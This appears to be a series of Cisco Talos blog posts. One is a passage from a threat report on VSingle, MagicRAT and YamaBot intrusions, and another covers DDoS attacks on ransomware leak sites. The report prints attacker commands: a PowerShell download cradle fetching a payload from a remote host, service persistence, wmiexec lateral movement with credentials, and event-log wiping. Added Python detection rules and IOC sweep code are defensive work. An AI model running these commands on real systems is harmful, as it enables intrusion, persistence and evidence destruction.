WMIC /node:<Computer_Name> process call create "powershell.exe (New-Object System.Net.Webclient).DownloadFile('<remote_location>/svhostw.exe','<local_path>\\svhostww.exe')" Download Payloads [T1608/001]
sc create <service_name> type= own type= interact start= auto error= ignore binpath= cmd /K start <local_path_2>\\svhostww.exe Persistence [T1543/003]


On the endpoints that were breached by performing lateral movement from an already compromised host, the implants were deployed either from a remote external location or from the source host itself by opening up interactive shells and using impacket tools:

Command Intent
powershell.exe Enter-PSSession Remote Access [T1219]
powershell.exe Invoke-Command -ComputerName <ComputerName> -ScriptBlock {cmd.exe /c dir} Remote Access [T1219]
python wmiexec.py <userid>:<password>@<local_IP_of_another_endpoint> 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1 Remote Access [T1219]

Cleanup


Once the backdoors and implants were persisted and activated on the endpoint, the reverse shell was used to perform cleanup [T1070]. This included deleting all files in the infection folder along with terminating the PowerShell tasks. The attacker-created accounts were removed and, finally, the Windows Event logs [T1070/001] were purged with the command below.

for /F tokens=* %1 in ('wevtutil.exe el') DO wevtutil.exe cl %1 1> \\127.0.0.1\ADMIN$\<log_file_name> 2>&1
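The command lines in the tables above (download cradle, password-protected RAR extraction, service persistence via cmd /K start, WMIC and Impacket remote execution, and the wevtutil log purge) are all visible in process-creation telemetry. The following is an added example, not Talos code or anything from the post: a set of regex rules over normalised process-creation records (assumed to carry host, user and cmdline fields, as one would extract from Windows Security 4688 or Sysmon Event ID 1), with a per-host triage step that escalates when several distinct TTPs land on the same machine. The sample records are constructed; 198.51.100.7 is a documentation address, and the ATT&CK labels are the ones the post uses for each command.

```python
"""Added example (not Talos code): command-line detections for the TTPs in the post.

Input: process-creation records normalised to dicts with host, user and cmdline
(assumed to come from Windows Security 4688 or Sysmon Event ID 1). The records
below are constructed for illustration; 198.51.100.7 is a documentation address.
"""
import re
from collections import defaultdict

# (rule name, ATT&CK technique as labelled in the post, regex over the command line)
RULES = [
    # PowerShell WebClient download cradle, as in the spr.tmp and svhostw.exe downloads.
    ("ps_download_cradle", "T1608/001",
     re.compile(r"\bpowershell(\.exe)?\b.*\.DownloadFile\(", re.I | re.S)),
    # Password-protected archive extraction with rar.exe (e or x verb plus -p<password>).
    ("rar_password_extract", "T1140",
     re.compile(r"\brar(\.exe)?\s+[ex]\s.*\s-p\S+", re.I | re.S)),
    # Service whose binary path launches a payload through cmd /K start.
    ("sc_create_cmd_start", "T1543/003",
     re.compile(r"\bsc(\.exe)?\s+create\b.*binpath=\s*cmd(\.exe)?\s+/[kc]\s+start\b", re.I | re.S)),
    # Remote process creation through WMIC /node, used to stage implants on other hosts.
    ("wmic_remote_process_create", "T1219",
     re.compile(r"\bwmic(\.exe)?\b.*/node:\S+.*\bprocess\s+call\s+create\b", re.I | re.S)),
    # Impacket wmiexec with inline user:password@target.
    ("impacket_wmiexec", "T1219",
     re.compile(r"\bwmiexec\.py\s+\S+:\S+@", re.I)),
    # Event log clearing; also matches the 'for /F ... wevtutil.exe cl %1' loop.
    ("wevtutil_clear", "T1070/001",
     re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I)),
]

# Constructed sample telemetry: one host that runs the whole chain, one that
# pivots to other machines, and two benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe",
     "cmdline": "powershell -exec bypass -command (New-Object System.Net.WebClient)"
                ".DownloadFile('http://198.51.100.7/spr.tmp', 'C:\\Users\\Public\\spr.tmp')"},
    {"host": "WS01", "user": "CORP\\jdoe",
     "cmdline": "C:\\Users\\Public\\rar.exe e C:\\Users\\Public\\spr.tmp C:\\Users\\Public\\sp -pSecretPw"},
    {"host": "WS01", "user": "CORP\\jdoe",
     "cmdline": "sc create svchelper type= own type= interact start= auto error= ignore "
                "binpath= cmd /K start C:\\Users\\Public\\sp\\svhostww.exe"},
    {"host": "WS01", "user": "CORP\\jdoe",
     "cmdline": "cmd.exe /c for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl %1"},
    {"host": "SRV02", "user": "CORP\\svc_backup",
     "cmdline": "WMIC /node:WS03 process call create \"powershell.exe (New-Object System.Net.Webclient)"
                ".DownloadFile('http://198.51.100.7/svhostw.exe','C:\\Windows\\Temp\\svhostww.exe')\""},
    {"host": "SRV02", "user": "CORP\\svc_backup",
     "cmdline": "python wmiexec.py CORP\\svc_backup:REDACTED@10.0.0.23 1> \\\\127.0.0.1\\ADMIN$\\__log 2>&1"},
    {"host": "WS04", "user": "CORP\\admin",            # benign PowerShell use
     "cmdline": "powershell.exe Get-ChildItem C:\\Windows\\Temp"},
    {"host": "WS05", "user": "CORP\\backupsvc",        # benign: exporting a log, not clearing it
     "cmdline": "wevtutil.exe epl Security C:\\backup\\sec.evtx"},
]


def detect(events):
    """Return one hit dict per (event, rule) pair whose command line matches."""
    hits = []
    for ev in events:
        for name, technique, rx in RULES:
            if rx.search(ev["cmdline"]):
                hits.append({"host": ev["host"], "user": ev["user"], "rule": name,
                             "technique": technique, "cmdline": ev["cmdline"]})
    return hits


def triage(hits, min_rules=2):
    """Group hits by host; a host tripping >= min_rules distinct rules is escalated.

    Returns {host: sorted list of rule names} for escalated hosts only.
    """
    by_host = defaultdict(set)
    for h in hits:
        by_host[h["host"]].add(h["rule"])
    return {host: sorted(rules) for host, rules in by_host.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for h in found:
        print(f"{h['host']:6} {h['rule']:28} {h['technique']}")
    print("escalate:", triage(found))
```

A single command line can trip more than one rule (the WMIC line above matches both the remote-execution and download-cradle rules), which is why triage counts distinct rules per host rather than raw hits; the benign export (`wevtutil epl`) and plain PowerShell use stay silent.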

Manual operations


In multiple instances, the attackers mistyped commands on the infected endpoint via the reverse shell, indicating that a human operator was manually driving the infections rather than an automated script:

ip config /all
net suer
netstat -noa | finstr 3389
powrshell.exe Get-AdUser -Filter * -Properties * | Select Name, logonCount
powrshell.exe Get-AdComputer -Filter * -Properties * | select Name, LastLogonDate, lastLogon, IPv4Address



Coverage


Ways our customers can detect and block this threat are listed below.


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Orbital Queries


Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here and here.


IOCs

The IOC list is also available in Talos' Github repo here.

VSingle

586F30907C3849C363145BFDCDABE3E2E4688CBD5688FF968E984B201B474730

MagicRAT

8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5
c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f
dda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469
90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4

YamaBot

f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb

Procdump

16F413862EFDA3ABA631D8A7AE2BFFF6D84ACD9F454A7ADAA518C7A8A6F375A5
05732E84DE58A3CC142535431B3AA04EFBE034CC96E837F93C360A6387D8FAAD

Mimikatz

6FBB771CD168B5D076525805D010AE0CD73B39AB1F4E6693148FE18B8F73090B
912018AB3C6B16B39EE84F17745FF0C80A33CEE241013EC35D0281E40C0658D9
CAF6739D50366E18C855E2206A86F64DA90EC1CDF3E309AEB18AC22C6E28DC65

3Proxy

2963a90eb9e499258a67d8231a3124021b42e6c70dacd3aab36746e51e3ce37e

PuTTY plink

2AA1BBBE47F04627A8EA4E8718AD21F0D50ADF6A32BA4E6133EE46CE2CD13780
5A73FDD0C4D0DEEA80FA13121503B477597761D82CF2CFB0E9D8DF469357E3F8

Adfind

C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3

IPs

104[.]155[.]149[.]103
40[.]121[.]90[.]194
185[.]29[.]8[.]162
146[.]4[.]21[.]94
46[.]183[.]221[.]109
84[.]38[.]133[.]145
109[.]248[.]150[.]13
155[.]94[.]210[.]11
192[.]186[.]183[.]133
54[.]68[.]42[.]4
213[.]180[.]180[.]154

URLS

hxxp[://]104[.]155[.]149[.]103/2-443[.]ps1
hxxp[://]104[.]155[.]149[.]103/8080[.]ps1
hxxp[://]104[.]155[.]149[.]103/mi64[.]tmp
hxxp[://]104[.]155[.]149[.]103/mi[.]tmp
hxxp[://]104[.]155[.]149[.]103/mm[.]rar
hxxp[://]104[.]155[.]149[.]103/pd64[.]tmp
hxxp[://]104[.]155[.]149[.]103/rar[.]tmp
hxxp[://]104[.]155[.]149[.]103/spr[.]tmp
hxxp[://]104[.]155[.]149[.]103/t[.]tmp
hxxp[://]104[.]155[.]149[.]103/update[.]tmp
hxxp[://]109[.]248[.]150[.]13:8080/1
hxxp[://]146[.]4[.]21[.]94/tmp/data_preview/virtual[.]php
hxxp[://]185[.]29[.]8[.]162:443/1[.]tmp
hxxp[://]40[.]121[.]90[.]194/11[.]jpg
hxxp[://]40[.]121[.]90[.]194/300dr[.]cert
hxxp[://]40[.]121[.]90[.]194/b[.]cert
hxxp[://]40[.]121[.]90[.]194/qq[.]cert
hxxp[://]40[.]121[.]90[.]194/ra[.]cert
hxxp[://]40[.]121[.]90[.]194/Rar[.]jpg
hxxp[://]40[.]121[.]90[.]194/tt[.]rar
hxxp[://]46[.]183[.]221[.]109//dfdfdfdfdfdfdfdfdfaflakjdfljaldjfladfljaldkfjlajdsflajdskf/huntertroy[.]exe
hxxp[://]46[.]183[.]221[.]109//dfdfdfdfdfdfdfdfdfaflakjdfljaldjfladfljaldkfjlajdsflajdskf/svhostw[.]exe
hxxp[://]84[.]38[.]133[.]145/board[.]html
hxxp[://]84[.]38[.]133[.]145/header[.]xml
hxxp[://]www[.]ajoa[.]org/home/manager/template/calendar[.]php
hxxp[://]www[.]ajoa[.]org/home/rar[.]tmp
hxxp[://]www[.]ajoa[.]org/home/tmp[.]ps1
hxxp[://]www[.]ajoa[.]org/home/ztt[.]tmp
hxxp[://]www[.]orvi00[.]com/ez/admin/shop/powerline[.]tmp

VSingle C2s

hxxps[://]tecnojournals[.]com/review
hxxps[://]semiconductboard[.]com/xml
hxxp[://]cyancow[.]com/find

MagicRAT C2s

hxxp[://]155[.]94[.]210[.]11/news/page[.]php
hxxp[://]192[.]186[.]183[.]133/bbs/board[.]php
hxxp[://]213[.]32[.]46[.]0/board[.]php
hxxp[://]54[.]68[.]42[.]4/mainboard[.]php
hxxp[://]84[.]38[.]133[.]145/apollom/jeus[.]php
hxxp[://]mudeungsan[.]or[.]kr/gbbs/bbs/template/g_botton[.]php
hxxp[://]www[.]easyview[.]kr/board/Kheader[.]php
hxxp[://]www[.]easyview[.]kr/board/mb_admin[.]php

YamaBot C2s

hxxp[://]213[.]180[.]180[.]154/editor/session/aaa000/support[.]php
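The indicators above are published defanged (hxxp, [.] and [://]), so they have to be normalised before they can be swept against proxy logs or file inventories. The following is an added example, not Talos code or part of the post: a small refanging loader that sorts a copied subset of the post's own IOC list into hashes, IPs, full URLs and hostnames, then matches constructed proxy log lines (squid-style fields: timestamp, client, method, URL, status) and constructed file records against it. Client addresses are RFC 1918 space and the log lines are invented; the indicator values themselves are the ones listed above.

```python
"""Added example (not Talos code): refang the post's IOC list and sweep it against logs.

IOC_TEXT is a subset copied from the post in its defanged form. The proxy log and
file records are constructed for illustration.
"""
import re
from urllib.parse import urlsplit

IOC_TEXT = """\
2963a90eb9e499258a67d8231a3124021b42e6c70dacd3aab36746e51e3ce37e
84[.]38[.]133[.]145
104[.]155[.]149[.]103
hxxp[://]104[.]155[.]149[.]103/spr[.]tmp
hxxp[://]www[.]ajoa[.]org/home/rar[.]tmp
hxxps[://]tecnojournals[.]com/review
"""

SHA256_RE = re.compile(r"^[0-9a-f]{64}$", re.I)
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


def refang(value):
    """Undo the defanging used in the post: hxxp -> http, [://] -> ://, [.] -> ."""
    value = value.strip().replace("[://]", "://").replace("[.]", ".")
    return re.sub(r"^hxxp", "http", value, flags=re.I)


def host_of(url):
    """Hostname of a URL, or of a bare host:port target such as a CONNECT request."""
    if "://" not in url:
        url = "//" + url
    return (urlsplit(url).hostname or "").lower()


def load_iocs(text):
    """Sort refanged indicators into hashes, IPs, full URLs and hostnames."""
    iocs = {"hashes": set(), "ips": set(), "urls": set(), "hosts": set()}
    for line in text.splitlines():
        value = refang(line)
        if not value:
            continue
        if SHA256_RE.match(value):
            iocs["hashes"].add(value.lower())
        elif IPV4_RE.match(value):
            iocs["ips"].add(value)
        elif value.lower().startswith(("http://", "https://")):
            iocs["urls"].add(value)
            iocs["hosts"].add(host_of(value))  # the host of a URL IOC is a weaker but useful match
        else:
            iocs["hosts"].add(value.lower())
    return iocs


# Constructed proxy log: timestamp, client, method, URL, status.
PROXY_LOG = """\
1662000000.101 10.0.0.5 GET http://104.155.149.103/spr.tmp 200
1662000000.205 10.0.0.7 GET http://84.38.133.145/board.html 200
1662000000.310 10.0.0.9 GET https://tecnojournals.com/review 200
1662000000.412 10.0.0.5 GET https://www.example.com/index.html 200
1662000000.515 10.0.0.8 CONNECT www.ajoa.org:443 200
"""

# Constructed file inventory records; the first hash is the post's 3Proxy indicator.
SAMPLE_FILES = [
    {"path": "C:\\Users\\Public\\msconf.exe",
     "sha256": "2963A90EB9E499258A67D8231A3124021B42E6C70DACD3AAB36746E51E3CE37E"},
    {"path": "C:\\Windows\\System32\\notepad.exe", "sha256": "deadbeef" * 8},
]


def match_proxy_log(log_text, iocs):
    """Return (client, url, kind) per request touching an indicator.

    kind is 'url' for an exact listed URL and 'host' when only the destination
    host or IP is listed (weaker signal, still worth a look).
    """
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        client, url = fields[1], fields[3]
        host = host_of(url)
        if url in iocs["urls"]:
            hits.append((client, url, "url"))
        elif host in iocs["ips"] or host in iocs["hosts"]:
            hits.append((client, url, "host"))
    return hits


def match_hashes(files, iocs):
    """Return (path, sha256) for files whose hash is listed, case-insensitively."""
    return [(f["path"], f["sha256"].lower()) for f in files
            if f["sha256"].lower() in iocs["hashes"]]


if __name__ == "__main__":
    iocs = load_iocs(IOC_TEXT)
    for hit in match_proxy_log(PROXY_LOG, iocs):
        print("proxy", *hit)
    for hit in match_hashes(SAMPLE_FILES, iocs):
        print("file", *hit)
```

Hash comparisons are lowercased on both sides because the post mixes upper- and lower-case SHA256 values, and CONNECT targets are handled by host_of so TLS traffic to a listed hostname is caught even though the proxy never sees the full URL.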

Talos EMEA Monthly Threat Update: How do you know if cyber insurance is right for you?

8 September 2022 at 09:00

On September's edition of the Monthly EMEA Threat Update, Hazel Burton and Martin Lee break down cyber insurance.

Although many businesses and organizations will think insurance will only help them in a worst-case scenario, that worst-case scenario comes for us all eventually.

Martin and Hazel discuss the benefits of having a cyber insurance policy and how it protects the policy holder when a cyber attack strikes. You can watch the full episode above or over on our YouTube page here.

Multiple ransomware data leak sites experience DDoS attacks, facing intermittent outages and connectivity issues

7 September 2022 at 15:00
By Azim Khodjibaev, Colin Grady, Paul Eubanks.

  • Since Aug. 20, 2022, Cisco Talos has been monitoring suspected distributed denial-of-service (DDoS) attacks resulting in intermittent downtime and outages affecting several ransomware-as-a-service (RaaS) data leak sites.
  • While the source and origin of this activity remain unknown, this appears to be a concentrated effort against RaaS leak sites to disrupt their efforts to announce and post new victim information.
  • Actors' responses have varied, with LockBit and ALPHV implementing new measures to counteract DDoS attacks against their sites while other groups like Quantum have simply resorted to redirecting web traffic elsewhere. LockBit also appears to have co-opted this technique by advertising that they are now adding DDoS as an extortion tactic in addition to encrypting and leaking data.

RaaS leak sites experience intermittent outages


In late August, Talos became aware of several prominent ransomware operations, such as ALPHV (also referred to as BlackCat) and LockBit, experiencing suspected DDoS attacks against their public data leak sites. These leak sites are typically hosted on Tor hidden services where, in a tactic known as double extortion, RaaS affiliates post victim information if the ransom demand is not met. On Aug. 26, we also observed at least seven more RaaS leak sites for LV, Hive, Everest, BianLian, Yanluowang, Snatch and Lorenz become inaccessible and go offline intermittently and/or experience slow traffic. Security researchers have also identified additional RaaS leak sites for Ragnar Locker and Vice Society which may have also been affected by this activity. However, we have only verified the Ragnar Locker claim at this time, as their leak site continues to experience outages. At the time of analysis, many of the aforementioned groups are still affected by connectivity issues and continue to face a variety of intermittent outages to their data leak sites, including frequent disconnects and unreachable hosts, suggesting that this is part of a sustained effort to thwart updates to those sites.

On Aug. 20, a LockBit representative, "LockBitSupp", reported that nearly 1,000 servers were targeting the LockBit data leak sites, with nearly 400 requests per second. After reporting that their leak sites became unavailable due to a DDoS attack, LockBit provided screenshots alleging that the attack began as soon as they started to publish data to their leak site for Entrust, a digital security company LockBit targeted in July.
LockBit representative "LockBitSupp" reports on DDoS attack against LockBit.

Translation:
Almost 1000 servers are targeting me, logs shows 400 requests a second on each domain, f** expenses

On Aug. 23, in another forum post by LockBitSupp, they claimed that this was the worst DDoS attack the site experienced in three years, indicating that the effects were significant.
LockBit representative commenting on DDoS attack impact.
Translation:
Kurisu: actually its pretty funny that the 'number 1 locker' can be held offline for 5 or how many days...not the best reputation 

LockBitSupp: only the blogs and victim chats were held down a bit, nothing serious, the panel is working as always, because the links to it are not known by anyone. In 3 years, this is the first time I got DDoSed this hard, there is no sense in it, only hypes us up more, over 50 people from all over the world wrote to me in Tox with an offer to help with different things

In the same timeframe, we identified that ALPHV, another high-profile ransomware group, was also experiencing similar connectivity issues with their leak site. On Aug. 26, they publicly denied they were being DDoSed, claiming they were unsure and that the sites were not available. Talos also observed unconfirmed chatter that ALPHV was on vacation at this time.
ALPHV ransomware group responds to claims of DDoS.

Translation:
unknown: who DDoSed you?

ALPHV: Hello, no one DDoSed us

unknown: how? didn't your blog go offline for a few days?

ALPHV: I was not here during this time, but seems like it wasn't a DDoS

Talos soon identified that ALPHV was among the affected ransomware groups, and that they quickly began responding by adding website protections to their leak site.

It is important to note that we have not observed RaaS customer or victim interaction sites affected by this activity, meaning that victim interactions and monetary payments can still take place. Several of the RaaS leak sites continue to appear to be offline intermittently, suggesting that this activity may be meant to disrupt and sow discord among RaaS operators and affiliates by interfering with attempts to post victim data to their respective sites. The possibility that these disruptions may be coming from a competitor or bring about unwanted law enforcement attention could create tension among some of the affected ransomware groups. The motivation and source of this activity remain unknown, but given the limited timeframe and number of affected RaaS operators, it appears to be a concerted effort against RaaS data leak sites to disrupt efforts to announce and post new victim information. This activity only affects the data leak sites, not the ability to conduct ransomware operations; what it hinders is the ability of these ransomware affiliates and operators to post new victim information publicly.

RaaS response


Talos has observed that some of the RaaS operations affected by this activity have quickly responded by implementing increased protections and measures to minimize outages from DDoS attacks.

On Aug. 22, following the initial round of DDoS attacks against their site, LockBitSupp claimed they were enhancing existing DDoS protections on their site. In another forum post on Aug. 23, LockBitSupp announced that LockBit was now looking to add DDoS as a third extortion tactic on top of encrypting and leaking data. Few ransomware groups use DDoS attacks, and LockBit's adoption of the technique could appeal to operators and possibly help drive up future recruitment efforts.
LockBitSupp claiming updated protections to LockBit's leak site.

Translation:
Unknown: how was your weekend

LockBitSupp: hello, normal weekend, got motivated by ddos and now standing up 100500 mirrors and modernizing. not just a life but a party! its was boring before :-)

Below is LockBit's official response following the DDoS attacks.
LockBit's official response following DDoS attacks.

Translation:
1. What doesn't kill you, only makes you stronger. We are strengthening the infrastructure, increasing the number of mirrors that mirror servers, and new ddos protections.

2. Please recommend a site where I can order ddos services against these stingy guys (or maybe someone local here does this? the site is entrust[.]com), that put in $5,000,000 and were ready to pay $1,000,000.

3. Access to them was not bought, they got accessed through a 0day

4. I'm loading all of their info (300gb) into a torrent seed, soon I'll share it with everyone who wants it in private in tox, and then will share the torrent link publicly.

5. We have already implemented the url randomization inside the ransomware, there will be a unique url generated within each locker build, which will not be detected by the DDoSer.

6. Developing a bulletproof storage system on the clearnet for all companies in addition to the tor ones.

7. Looking for a team of DDoSers, apparently we are now going to attack targets and offer triple extortion, encryption, data leak + ddos...now that i have felt the power of ddos and how refreshing and interesting it makes life

Entrust, thank you for the motivation, you are making us stronger, but you will remain a hollow and stingy firm as you have been, and in a few days the whole world will know all of your secrets, if I were you I would pay before it is too late, we'd destroy your information, because so far no one has been able to download it due to the ddos.

Shortly after, ALPHV also started implementing more robust anti-scrape technology on their leak site, an approach that appears to reduce the load of DDoS attacks and could be a component of added DDoS protections.
ALPHV implementations to their data leak site.

In this same timeframe, Talos identified that the Quantum ransomware operation had recently started to redirect traffic issued to their data leak blogs (both on the clear web and on the Tor hidden services network) back to the localhost of the computer that made the web request, with the following response: "HTTP/1.1 301 Moved Permanently." This likely indicates that they understand there are active DDoS attempts directed against their site, although this traffic redirection did not allow their site to continue serving traffic. Compared to LockBit's approach, this response may speak to a slightly more amateur skill level, suggesting limitations in Quantum's capability to respond to a DDoS attack by properly filtering attack traffic while allowing their website to continue responding to legitimate traffic.

Given that this activity is continuing to interrupt and hinder the ability for these affiliates and operators to post new victim information publicly, we will likely continue to see various groups respond differently depending on the resources available to them.

